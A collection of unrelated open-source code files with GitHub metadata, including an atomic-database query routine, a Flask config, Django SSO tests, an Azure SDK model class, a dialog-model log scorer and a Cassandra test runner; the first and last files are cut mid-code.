(number,fullname,ele_val) = safe_fetchone(3,"general")
# default : take the most abundant isotope
if(isotope<0):
cursor.execute("""SELECT abundance,isotope FROM isotope
WHERE label = ?""",(name,))
list_isotope = cursor.fetchall()
abund=0.
isotope=None
for val in list_isotope:
if(val[0]==None):
continue
if(val[0]>abund):
abund=val[0]
isotope=val[1]
cursor.execute("""SELECT mass,spin,mag_moment FROM isotope WHERE label = ?
and isotope = ?""",(name,isotope))
(mass,nuclear_spin,mag_moment) = safe_fetchone(3,"isotope")
nuclear_spin=nuclear_spin/2. # database store 2 * S as integer
cursor.execute("""SELECT energy,configuration
,totalSpin,totalOrbital,totalJ
,method FROM energy
WHERE label = ?
and charge = ?""",(name,charge))
list_ener=cursor.fetchall()
if(len(list_ener)==0):
energy=[]
configuration=[]
dipole=[]
energy_method=[]
lifetime=[]
else:
# select JJ or LS representation
list_energy=[]
for row in list_ener:
if(spinorbit):
if(row[4] >= 0.):
list_energy.append(list(row))
else:
if(row[4] < 0.):
list_energy.append(list(row))
# select method and delete less accurate entry
list_energy=merge(list_energy,method)
list_energy.sort(key=itemgetter(0))
energy=[]
lifetime=[]
configuration=[]
energy_method=[]
for val in list_energy:
energy.append(val[0])
configuration.append((val[1],val[2]/2.,val[3]/2.,val[4]/2.))
energy_method.append(method[val[5]])
nener=len(list_energy)
dipole=np.zeros([nener,nener])
for i in range(nener):
for j in range(i,nener):
for val in method_dip:
cursor.execute("""SELECT
dipole
FROM dipole
WHERE label = ?
and charge = ?
and method = ?
and configuration = ?
and totalSpin = ?
and totalOrbital = ?
and totalJ = ?
and exc_configuration = ?
and exc_totalSpin = ?
and exc_totalOrbital = ?
and exc_totalJ = ?
""",(name,charge,val
,list_energy[i][1],list_energy[i][2]
,list_energy[i][3],list_energy[i][4]
,list_energy[j][1],list_energy[j][2]
,list_energy[j][3],list_energy[j][4]))
dip = safe_fetchone(1,"dipole")[0]
if (dip != None):
dipole[i,j] = dip
break
dipole[j,i]=dipole[i,j]
# look at lifetime of each levels
cursor.execute("""SELECT
lifetime
FROM lifetime
WHERE label = ?
and charge = ?
and configuration = ?
and totalSpin = ?
and totalOrbital = ?
and totalJ = ?
""",(name,charge
,list_energy[i][1],list_energy[i][2]/2
,list_energy[i][3]/2,list_energy[i][4]/2))
life = safe_fetchone(1,"lifetime")[0]
if (life == None): life=-1.
lifetime.append(life)
ele=Element(number,name,fullname,mass,charge,ele_val,nuclear_spin,mag_moment
,configuration,energy,energy_method,dipole,lifetime)
return ele
|
{
"content_hash": "794d50c7ee99edb0258de3edab3c2694",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 100,
"avg_line_length": 35.77777777777778,
"alnum_prop": 0.49159663865546216,
"repo_name": "rvexiau/mypython",
"id": "40aebfef8dfc6814c803a4e0da22416cc2cd3824",
"size": "5521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mypython/database/create_atom.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "509161"
}
],
"symlink_target": ""
}
|
import os
import sys
from raygun4py.middleware import flask as flask_raygun
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 3:
import urllib.parse
else:
import urlparse
basedir = os.path.abspath(os.path.dirname(__file__))
if os.path.exists('config.env'):
print('Importing environment from .env file')
for line in open('config.env'):
var = line.strip().split('=')
if len(var) == 2:
os.environ[var[0]] = var[1]
class Config:
APP_NAME = 'Legal-Checkup'
if os.environ.get('SECRET_KEY'):
SECRET_KEY = os.environ.get('SECRET_KEY')
else:
SECRET_KEY = 'SECRET_KEY_ENV_VAR_NOT_SET'
print('SECRET KEY ENV VAR NOT SET! SHOULD NOT SEE IN PRODUCTION')
SQLALCHEMY_COMMIT_ON_TEARDOWN = True
MAIL_SERVER = 'smtp.sendgrid.net'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD') or 'password'
ADMIN_EMAIL = os.environ.get(
'ADMIN_EMAIL') or 'flask-base-admin@example.com'
EMAIL_SUBJECT_PREFIX = '[{}]'.format(APP_NAME)
EMAIL_SENDER = '{app_name} Admin <{email}>'.format(
app_name=APP_NAME, email=MAIL_USERNAME)
REDIS_URL = os.getenv('REDISTOGO_URL') or 'http://localhost:6379'
RAYGUN_APIKEY = os.environ.get('RAYGUN_APIKEY')
# Parse the REDIS_URL to set RQ config variables
if PYTHON_VERSION == 3:
urllib.parse.uses_netloc.append('redis')
url = urllib.parse.urlparse(REDIS_URL)
else:
urlparse.uses_netloc.append('redis')
url = urlparse.urlparse(REDIS_URL)
RQ_DEFAULT_HOST = url.hostname
RQ_DEFAULT_PORT = url.port
RQ_DEFAULT_PASSWORD = url.password
RQ_DEFAULT_DB = 0
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
ASSETS_DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
print('THIS APP IS IN DEBUG MODE. YOU SHOULD NOT SEE THIS IN PRODUCTION.')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-test.sqlite')
WTF_CSRF_ENABLED = False
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
SSL_DISABLE = (os.environ.get('SSL_DISABLE') or 'True') == 'True'
@classmethod
def init_app(cls, app):
Config.init_app(app)
assert os.environ.get('SECRET_KEY'), 'SECRET_KEY IS NOT SET!'
flask_raygun.Provider(app, app.config['RAYGUN_APIKEY']).attach()
class HerokuConfig(ProductionConfig):
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# Handle proxy server headers
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
class UnixConfig(ProductionConfig):
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# Log to syslog
import logging
from logging.handlers import SysLogHandler
syslog_handler = SysLogHandler()
syslog_handler.setLevel(logging.WARNING)
app.logger.addHandler(syslog_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig,
'heroku': HerokuConfig,
'unix': UnixConfig
}
|
{
"content_hash": "7d0a50be198e4a822788117fa6a92426",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 78,
"avg_line_length": 29.5609756097561,
"alnum_prop": 0.650990099009901,
"repo_name": "hack4impact/legal-checkup",
"id": "991b6ed3172becb334fb79c8fe22b4043dee6bd6",
"size": "3636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "5757"
},
{
"name": "HTML",
"bytes": "48084"
},
{
"name": "JavaScript",
"bytes": "9422"
},
{
"name": "Python",
"bytes": "59640"
}
],
"symlink_target": ""
}
|
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
from django.utils import unittest
from openid.consumer.consumer import SuccessResponse
from openid.consumer.discover import OpenIDServiceEndpoint
from openid.message import Message, OPENID2_NS
from admin_sso import settings
from admin_sso.auth import DjangoSSOAuthBackend
from admin_sso.models import Assignment
from . import skipIfOpenID, skipIfOAuth
SREG_NS = "http://openid.net/sreg/1.0"
class AuthModuleTests(unittest.TestCase):
def setUp(self):
self.auth_module = DjangoSSOAuthBackend()
self.user = User.objects.create(username='admin_sso1')
self.assignment1 = Assignment.objects.create(username='',
username_mode=settings.ASSIGNMENT_ANY,
domain='example.com',
user=self.user,
weight=100)
def tearDown(self):
self.user.delete()
Assignment.objects.all().delete()
def test_empty_authenticate(self):
user = self.auth_module.authenticate()
self.assertEqual(user, None)
@skipIfOpenID
def test_simple_assignment(self):
email = "foo@example.com"
user = self.auth_module.authenticate(sso_email=email)
self.assertEqual(user, self.user)
def create_sreg_response(self, fullname='', email='', identifier=''):
message = Message(OPENID2_NS)
message.setArg(SREG_NS, "fullname", fullname)
message.setArg(SREG_NS, "email", email)
endpoint = OpenIDServiceEndpoint()
endpoint.display_identifier = identifier
return SuccessResponse(endpoint, message, signed_fields=message.toPostArgs().keys())
@skipIfOAuth
def test_domain_matches(self):
response = self.create_sreg_response(fullname="User Name", email="foo@example.com", identifier='7324')
user = self.auth_module.authenticate(openid_response=response)
self.assertEqual(user, self.user)
def test_get_user(self):
user = self.auth_module.get_user(self.user.id)
self.assertEqual(user, self.user)
user = self.auth_module.get_user(self.user.id + 42)
self.assertEqual(user, None)
class AssignmentManagerTests(unittest.TestCase):
def setUp(self):
self.user = User.objects.create(username='admin_sso1')
self.assignment1 = Assignment.objects.create(username='',
username_mode=settings.ASSIGNMENT_ANY,
domain='example.com',
user=self.user,
weight=100)
self.assignment2 = Assignment.objects.create(username='*bar',
username_mode=settings.ASSIGNMENT_MATCH,
domain='example.com',
user=self.user,
weight=200)
self.assignment3 = Assignment.objects.create(username='foo*',
username_mode=settings.ASSIGNMENT_EXCEPT,
domain='example.com',
user=self.user,
weight=300)
def tearDown(self):
self.user.delete()
Assignment.objects.all().delete()
def test_domain_matches(self):
email = "foo@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment1)
def test_invalid_domain(self):
email = 'someone@someotherdomain.com'
user = Assignment.objects.for_email(email)
self.assertIsNone(user)
def test_domain_matches_and_username_ends_with_bar(self):
email = "foobar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment2)
def test_domain_matches_and_username_doesnt_begin_with_foo(self):
email = "bar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment3)
def test_invalid_email(self):
email = 'invalid'
user = Assignment.objects.for_email(email)
self.assertEqual(user, None)
def test_change_weight(self):
self.assignment2.weight = 50
self.assignment2.save()
email = "foobar@example.com"
user = Assignment.objects.for_email(email)
self.assertEqual(user, self.assignment1)
|
{
"content_hash": "bf0134a5c43d40c42528cb8e82f938c9",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 110,
"avg_line_length": 40.51239669421488,
"alnum_prop": 0.5720114239086087,
"repo_name": "allink/django-admin-sso",
"id": "5d3c978c19198bf8f7e5d61cdec362c560e6e039",
"size": "4902",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "admin_sso/tests/test_auth.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "402"
},
{
"name": "Python",
"bytes": "37960"
}
],
"symlink_target": ""
}
|
from common import startfile, SIZES, classname, cells
if __name__ == '__main__':
fd = startfile("functions", "Identity")
def line(s=""):
print >> fd, s
for rows in SIZES:
line("import org.dnikulin.jula.fixed.%s;" % classname(rows, rows))
line()
line("public final class Identity {")
for rows in SIZES:
line(" public static void setIdentity(final %s a) {" % classname(rows, rows))
for (row, col, label) in cells(rows, rows):
value = (1 if (row == col) else 0)
line(" a.%s = %d;" % (label, value))
line(" }")
line()
line(" private Identity() {}")
line("}")
fd.flush()
fd.close()
|
{
"content_hash": "9e992e9ad7cb20f4abc51ba01959b952",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 88,
"avg_line_length": 27.346153846153847,
"alnum_prop": 0.5218002812939522,
"repo_name": "dnikulin/jula",
"id": "3489b55b63a1e90ddd4fda88e38158d7185e3e52",
"size": "1294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/make_identity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "5689"
},
{
"name": "Python",
"bytes": "17121"
},
{
"name": "Shell",
"bytes": "324"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class Resource(Model):
"""The Resource definition for other than namespace.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id
:vartype id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self):
self.id = None
self.name = None
self.type = None
|
{
"content_hash": "57a53eb0e369ed97f7aa503fa04c705e",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 72,
"avg_line_length": 23.666666666666668,
"alnum_prop": 0.5428937259923176,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "3ceb6eac8a771bad0c4f3517df2de5dd65b266bd",
"size": "1255",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "azure-mgmt-servicebus/azure/mgmt/servicebus/models/resource.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
}
|
''' Description : Extact performance scores in log folder, and print them in tables
Author : Xuesong Yang
Email : xyang45@illinois.edu
Created Date: Dec.31, 2016
'''
import re
from prettytable import PrettyTable
def getScore(fname, prefix=''):
score_lst = list()
with open(fname, 'rb') as f:
for line in f:
m = re.match(r'{}precision=(?P<precision>.*), recall=(?P<recall>.*), fscore=(?P<fscore>.*), accuracy_frame=(?P<accuracy_frame>.*)'.format(prefix), line)
if m is not None:
score_dct = {key: val for (key, val) in m.groupdict().iteritems()}
score_lst.append(score_dct)
return score_lst
def baselineScore(fname):
names_lst = ['oracle_act', 'nlu_tag', 'nlu_intent', 'policy']
score_lst = getScore(fname, prefix='\t')
scores = {key: val for (key, val) in zip(names_lst, score_lst)}
return scores
def jointModelScore(fname_tag, fname_intent, fname_act):
names_lst = ['nlu_tag', 'nlu_intent', 'policy']
score_tag = getScore(fname_tag, prefix='SlotTagging: ')
score_intent = getScore(fname_intent, prefix='IntentPred: ')
score_act = getScore(fname_act, prefix='AgentActPred: ')
score_all = score_tag + score_intent + score_act
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def slotTaggingScore(fname_tag, fname_intent):
names_lst = ['nlu_tag', 'nlu_intent']
score_tag = getScore(fname_tag, prefix='SlotTagging: ')
score_intent = getScore(fname_intent, prefix='IntentPred: ')
score_all = score_tag + score_intent
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def bilstmOracleScore(fname):
score_lst = getScore(fname, prefix='AgentActPred: ')
return {'policy': score_lst[0]}
def pipelineBilstmScore(fname):
names_lst = ['nlu_tag', 'nlu_intent', 'policy']
score_tag = getScore(fname, prefix='SlotTagging: ')
score_intent = getScore(fname, prefix='IntentPred: ')
score_act = getScore(fname, prefix='AgentActPred: ')
score_all = score_tag + score_intent + score_act
scores = {key: val for (key, val) in zip(names_lst, score_all)}
return scores
def getFrameScore(tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname):
hit = 0.
sample_nb = 0.
with open(tag_pred_fname, 'rb') as tag_fpred, open(tag_target_fname, 'rb') as tag_ftarget,\
open(intent_pred_fname, 'rb') as intent_fpred, open(intent_target_fname, 'rb') as intent_ftarget:
for (tag_pred, tag_target, intent_pred, intent_target) in zip(tag_fpred, tag_ftarget, intent_fpred, intent_ftarget):
sample_nb += 1.
i_pred = sorted(set(intent_pred.split(';')))
i_target = sorted(set(intent_target.split(';')))
if (i_pred == i_target) and (tag_pred == tag_target):
hit += 1.
accuracy_frame = hit / sample_nb
return accuracy_frame
def nluFrameScore(baseline_fname, pipeline_fname, joint_tag_fname, joint_intent_fname):
acc_frame = dict()
baseline_tag_pred_fname, baseline_tag_target_fname, baseline_intent_pred_fname, baseline_intent_target_fname = getBaselineFnames(baseline_fname)
baseline_AccFr = getFrameScore(baseline_tag_pred_fname, baseline_tag_target_fname, baseline_intent_pred_fname, baseline_intent_target_fname)
acc_frame['Baseline'] = '{:.4f}'.format(baseline_AccFr)
pipe_tag_pred_fname, pipe_tag_target_fname, pipe_intent_pred_fname, pipe_intent_target_fname = getPipelineFnames(pipeline_fname)
pipeline_AccFr = getFrameScore(pipe_tag_pred_fname, pipe_tag_target_fname, pipe_intent_pred_fname, pipe_intent_target_fname)
acc_frame['Pipeline'] = '{:.4f}'.format(pipeline_AccFr)
joint_tag_pred_fname, joint_tag_target_fname = getFname(joint_tag_fname, prefix='tag')
joint_intent_pred_fname, joint_intent_target_fname = getFname(joint_intent_fname, prefix='intent')
joint_AccFr = getFrameScore(joint_tag_pred_fname, joint_tag_target_fname, joint_intent_pred_fname, joint_intent_target_fname)
acc_frame['JointModel'] = '{:.4f}'.format(joint_AccFr)
return acc_frame
def getFname(fname, prefix=''):
pred_fname = ''
target_fname = ''
with open(fname, 'rb') as f:
for line in f:
m = re.match(r'\t{0}_target=(?P<{0}_target>.*)'.format(prefix), line)
if m is not None:
target_fname = m.group('{}_target'.format(prefix))
continue
else:
m = re.match(r'\t{0}_pred=(?P<{0}_pred>.*)'.format(prefix), line)
if m is not None:
pred_fname = m.group('{}_pred'.format(prefix))
assert target_fname != '' and pred_fname != '', 'Can not find file name.'
return (pred_fname, target_fname)
def getPipelineFnames(pipeline_fname):
tag_target_fname = ''
tag_pred_fname = ''
intent_target_fname = ''
intent_pred_fname = ''
with open(pipeline_fname, 'rb') as f:
for line in f:
m = re.match(r'\ttag_target=(?P<tag_target>.*)', line)
if m is not None:
tag_target_fname = m.group('tag_target')
continue
else:
m = re.match(r'\ttag_pred=(?P<tag_pred>.*)', line)
if m is not None:
tag_pred_fname = m.group('tag_pred')
continue
else:
m = re.match(r'\tintent_pred=(?P<intent_pred>.*)', line)
if m is not None:
intent_pred_fname = m.group('intent_pred')
continue
else:
m = re.match(r'\tintent_target=(?P<intent_target>.*)', line)
if m is not None:
intent_target_fname = m.group('intent_target')
assert tag_target_fname != '' and tag_pred_fname != '' and intent_target_fname != '' and intent_pred_fname != '', 'Can not find file name.'
return (tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname)
def getBaselineFnames(baseline_fname):
tag_target_fname = ''
tag_pred_fname = ''
intent_target_fname = ''
intent_pred_fname = ''
with open(baseline_fname, 'rb') as f:
for line in f:
m = re.match(r'\ttag_target=(?P<tag_target>.*)', line)
if m is not None:
tag_target_fname = m.group('tag_target')
continue
else:
m = re.match(r'\ttag_pred=(?P<tag_pred>.*)', line)
if m is not None:
tag_pred_fname = m.group('tag_pred')
continue
else:
m = re.match(r'\ttest_pred=(?P<intent_pred>.*pipeline_intent-test.pred)', line)
if m is not None:
intent_pred_fname = m.group('intent_pred')
continue
else:
m = re.match(r'\ttest_target=(?P<intent_target>.*pipeline_intent-test.target)', line)
if m is not None:
intent_target_fname = m.group('intent_target')
assert tag_target_fname != '' and tag_pred_fname != '' and intent_target_fname != '' and intent_pred_fname != '', 'Can not find file name.'
return (tag_pred_fname, tag_target_fname, intent_pred_fname, intent_target_fname)
def tableEnd2End(baseline, pipeline, jointModel, bilstmOracle):
table = PrettyTable()
table.field_names = ['Models', 'Fscore', 'Precision', 'Recall', 'Accuracy_Frame']
table.align['Models'] = 'l'
table.add_row(['Baseline(CRF+SVMs+SVMs)', baseline['policy']['fscore'], baseline['policy']['precision'], baseline['policy']['recall'], baseline['policy']['accuracy_frame']])
table.add_row(['Pipeline(biLSTM+biLSTM+biLSTM)', pipeline['policy']['fscore'], pipeline['policy']['precision'], pipeline['policy']['recall'], pipeline['policy']['accuracy_frame']])
table.add_row(['JointModel(biLSTM+biLSTM+biLSTM)', jointModel['policy']['fscore'], jointModel['policy']['precision'], jointModel['policy']['recall'], jointModel['policy']['accuracy_frame']])
table.add_row(['Oracle(SVMs)', baseline['oracle_act']['fscore'], baseline['oracle_act']['precision'], baseline['oracle_act']['recall'], baseline['oracle_act']['accuracy_frame']])
table.add_row(['Oracle(biLSTM)', bilstmOracle['policy']['fscore'], bilstmOracle['policy']['precision'], bilstmOracle['policy']['recall'], bilstmOracle['policy']['accuracy_frame']])
return table
def tableNLU(baseline, pipeline, jointModel, frame):
table = PrettyTable()
table.field_names = ['Models', 'tagF', 'tagP', 'tagR', 'tagAccFr', 'intF', 'intP', 'intR', 'intAccFr', 'nluAccFr']
table.align['Models'] = 'l'
table.add_row(['Baseline', baseline['nlu_tag']['fscore'], baseline['nlu_tag']['precision'], baseline['nlu_tag']['recall'], baseline['nlu_tag']['accuracy_frame'], baseline['nlu_intent']['fscore'], baseline['nlu_intent']['precision'], baseline['nlu_intent']['recall'], baseline['nlu_intent']['accuracy_frame'], frame['Baseline']])
table.add_row(['Pipeline', pipeline['nlu_tag']['fscore'], pipeline['nlu_tag']['precision'], pipeline['nlu_tag']['recall'], pipeline['nlu_tag']['accuracy_frame'], pipeline['nlu_intent']['fscore'], pipeline['nlu_intent']['precision'], pipeline['nlu_intent']['recall'], pipeline['nlu_intent']['accuracy_frame'], frame['Pipeline']])
table.add_row(['JointModel', jointModel['nlu_tag']['fscore'], jointModel['nlu_tag']['precision'], jointModel['nlu_tag']['recall'], jointModel['nlu_tag']['accuracy_frame'], jointModel['nlu_intent']['fscore'], jointModel['nlu_intent']['precision'], jointModel['nlu_intent']['recall'], jointModel['nlu_intent']['accuracy_frame'], frame['JointModel']])
return table
if __name__ == '__main__':
baseline = './log/nohup_baseline_test.log'
pipelineBilstm = './log/nohup_pipelineBiLSTM_test.log'
jointModel_tag = './log/nohup_jointModel_tag_test.log'
jointModel_intent = './log/nohup_jointModel_intent_test.log'
jointModel_act = './log/nohup_jointModel_act_test.log'
slotTagging_intent = './log/nohup_slotTagging_intent_test.log'
slotTagging_tag = './log/nohup_slotTagging_tag_test.log'
agentAct_oracle = './log/nohup_agentAct_oracle_test.log'
scores_baseline = baselineScore(baseline)
# print(scores_baseline)
scores_jointModel = jointModelScore(jointModel_tag, jointModel_intent, jointModel_act)
# print(scores_jointModel)
scores_slotTagging = slotTaggingScore(slotTagging_tag, slotTagging_intent)
#print(scores_slotTagging)
scores_bilstmOracle = bilstmOracleScore(agentAct_oracle)
#print(scores_bilstmOracle)
scores_pipelineBilstm = pipelineBilstmScore(pipelineBilstm)
#print(scores_pipelineBilstm)
scores_frame = nluFrameScore(baseline, pipelineBilstm, jointModel_tag, jointModel_intent)
#print(scores_frame)
end2end_table = tableEnd2End(scores_baseline, scores_pipelineBilstm, scores_jointModel, scores_bilstmOracle)
print('Table 1 Perforamce of End2End Models')
print(end2end_table)
print('\n\n')
nlu_table = tableNLU(scores_baseline, scores_pipelineBilstm, scores_jointModel, scores_frame)
print('Table 2 Perforamce of NLU Models')
print(nlu_table)
|
{
"content_hash": "bae11f446182f0a1fc09c8d8b032c1c6",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 352,
"avg_line_length": 50.415929203539825,
"alnum_prop": 0.6248902931367386,
"repo_name": "XuesongYang/end2end_dialog",
"id": "2870acbb715c91167eab89ebb756b56bc8876d76",
"size": "11394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analyze_log.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140516"
},
{
"name": "Shell",
"bytes": "7058"
}
],
"symlink_target": ""
}
|
"""
usage: run_dtests.py [-h] [--use-vnodes] [--use-off-heap-memtables] [--num-tokens NUM_TOKENS] [--data-dir-count-per-instance DATA_DIR_COUNT_PER_INSTANCE] [--force-resource-intensive-tests]
[--skip-resource-intensive-tests] [--cassandra-dir CASSANDRA_DIR] [--cassandra-version CASSANDRA_VERSION] [--delete-logs] [--execute-upgrade-tests] [--disable-active-log-watching]
[--keep-test-dir] [--enable-jacoco-code-coverage] [--dtest-enable-debug-logging] [--dtest-print-tests-only] [--dtest-print-tests-output DTEST_PRINT_TESTS_OUTPUT]
[--pytest-options PYTEST_OPTIONS] [--dtest-tests DTEST_TESTS]
optional arguments:
-h, --help show this help message and exit
--use-vnodes Determines wither or not to setup clusters using vnodes for tests (default: False)
--use-off-heap-memtables Enable Off Heap Memtables when creating test clusters for tests (default: False)
--num-tokens NUM_TOKENS Number of tokens to set num_tokens yaml setting to when creating instances with vnodes enabled (default: 256)
--data-dir-count-per-instance DATA_DIR_COUNT_PER_INSTANCE Control the number of data directories to create per instance (default: 3)
--force-resource-intensive-tests Forces the execution of tests marked as resource_intensive (default: False)
--skip-resource-intensive-tests Skip all tests marked as resource_intensive (default: False)
--cassandra-dir CASSANDRA_DIR
--cassandra-version CASSANDRA_VERSION
--delete-logs
--execute-upgrade-tests Execute Cassandra Upgrade Tests (e.g. tests annotated with the upgrade_test mark) (default: False)
--disable-active-log-watching Disable ccm active log watching, which will cause dtests to check for errors in the logs in a single operation instead of semi-realtime
processing by consuming ccm _log_error_handler callbacks (default: False)
--keep-test-dir Do not remove/cleanup the test ccm cluster directory and it's artifacts after the test completes (default: False)
--enable-jacoco-code-coverage Enable JaCoCo Code Coverage Support (default: False)
--dtest-enable-debug-logging Enable debug logging (for this script, pytest, and during execution of test functions) (default: False)
--dtest-print-tests-only Print list of all tests found eligible for execution given the provided options. (default: False)
--dtest-print-tests-output DTEST_PRINT_TESTS_OUTPUT Path to file where the output of --dtest-print-tests-only should be written to (default: False)
--pytest-options PYTEST_OPTIONS Additional command line arguments to proxy directly thru when invoking pytest. (default: None)
--dtest-tests DTEST_TESTS Comma separated list of test files, test classes, or test methods to execute. (default: None)
"""
import subprocess
import sys
import os
import re
import logging
from os import getcwd
from tempfile import NamedTemporaryFile
from bs4 import BeautifulSoup
from _pytest.config import Parser
import argparse
from conftest import pytest_addoption
logger = logging.getLogger(__name__)
class RunDTests():
def run(self, argv):
parser = argparse.ArgumentParser(formatter_class=lambda prog: argparse.ArgumentDefaultsHelpFormatter(prog,
max_help_position=100,
width=200))
# this is a bit ugly: all of our command line arguments are added and configured as part
# of pytest. however, we also have this wrapper script to make it easier for those who
# aren't comfortable calling pytest directly. To avoid duplicating code (e.g. have the options
# in two separate places) we directly use the pytest_addoption fixture from conftest.py. Unfortunately,
# pytest wraps ArgumentParser, so, first we add the options to a pytest Parser, and then we pull
# all of those custom options out and add them to the unwrapped ArgumentParser we want to use
# here inside of run_dtests.py.
#
# So NOTE: to add a command line argument, if you're trying to do so by adding it here, you're doing it wrong!
# add it to conftest.py:pytest_addoption
pytest_parser = Parser()
pytest_addoption(pytest_parser)
# add all of the options from the pytest Parser we created, and add them into our ArgumentParser instance
pytest_custom_opts = pytest_parser._anonymous
for opt in pytest_custom_opts.options:
parser.add_argument(opt._long_opts[0], action=opt._attrs['action'],
default=opt._attrs.get('default', None),
help=opt._attrs.get('help', None))
parser.add_argument("--dtest-enable-debug-logging", action="store_true", default=False,
help="Enable debug logging (for this script, pytest, and during execution "
"of test functions)")
parser.add_argument("--dtest-print-tests-only", action="store_true", default=False,
help="Print list of all tests found eligible for execution given the provided options.")
parser.add_argument("--dtest-print-tests-output", action="store", default=False,
help="Path to file where the output of --dtest-print-tests-only should be written to")
parser.add_argument("--pytest-options", action="store", default=None,
help="Additional command line arguments to proxy directly thru when invoking pytest.")
parser.add_argument("--dtest-tests", action="store", default=None,
help="Comma separated list of test files, test classes, or test methods to execute.")
args = parser.parse_args()
if not args.dtest_print_tests_only and args.cassandra_dir is None:
if args.cassandra_version is None:
raise Exception("Required dtest arguments were missing! You must provide either --cassandra-dir "
"or --cassandra-version. Refer to the documentation or invoke the help with --help.")
if args.dtest_enable_debug_logging:
logging.root.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Get dictionaries corresponding to each point in the configuration matrix
# we want to run, then generate a config object for each of them.
logger.debug('Generating configurations from the following matrix:\n\t{}'.format(args))
args_to_invoke_pytest = []
if args.pytest_options:
for arg in args.pytest_options.split(" "):
args_to_invoke_pytest.append("'{the_arg}'".format(the_arg=arg))
for arg in argv:
if arg.startswith("--pytest-options") or arg.startswith("--dtest-"):
continue
args_to_invoke_pytest.append("'{the_arg}'".format(the_arg=arg))
if args.dtest_print_tests_only:
args_to_invoke_pytest.append("'--collect-only'")
if args.dtest_tests:
for test in args.dtest_tests.split(","):
args_to_invoke_pytest.append("'{test_name}'".format(test_name=test))
original_raw_cmd_args = ", ".join(args_to_invoke_pytest)
logger.debug("args to call with: [%s]" % original_raw_cmd_args)
# the original run_dtests.py script did it like this to hack around nosetest
# limitations -- i'm not sure if they still apply or not in a pytest world
# but for now just leaving it as is, because it does the job (although
# certainly is still pretty complicated code and has a hacky feeling)
to_execute = (
"import pytest\n" +
(
"pytest.main([{options}])\n").format(options=original_raw_cmd_args)
)
temp = NamedTemporaryFile(dir=getcwd())
logger.debug('Writing the following to {}:'.format(temp.name))
logger.debug('```\n{to_execute}```\n'.format(to_execute=to_execute))
temp.write(to_execute.encode("utf-8"))
temp.flush()
# We pass nose_argv as options to the python call to maintain
# compatibility with the nosetests command. Arguments passed in via the
# command line are treated one way, args passed in as
# nose.main(argv=...) are treated another. Compare with the options
# -xsv for an example.
cmd_list = [sys.executable, temp.name]
logger.debug('subprocess.call-ing {cmd_list}'.format(cmd_list=cmd_list))
sp = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=os.environ.copy())
if args.dtest_print_tests_only:
stdout, stderr = sp.communicate()
if stderr:
print(stderr.decode("utf-8"))
result = sp.returncode
exit(result)
all_collected_test_modules = collect_test_modules(stdout)
joined_test_modules = "\n".join(all_collected_test_modules)
#print("Collected %d Test Modules" % len(all_collected_test_modules))
if args.dtest_print_tests_output is not None:
collected_tests_output_file = open(args.dtest_print_tests_output, "w")
collected_tests_output_file.write(joined_test_modules)
collected_tests_output_file.close()
print(joined_test_modules)
else:
while True:
stdout_output = sp.stdout.readline()
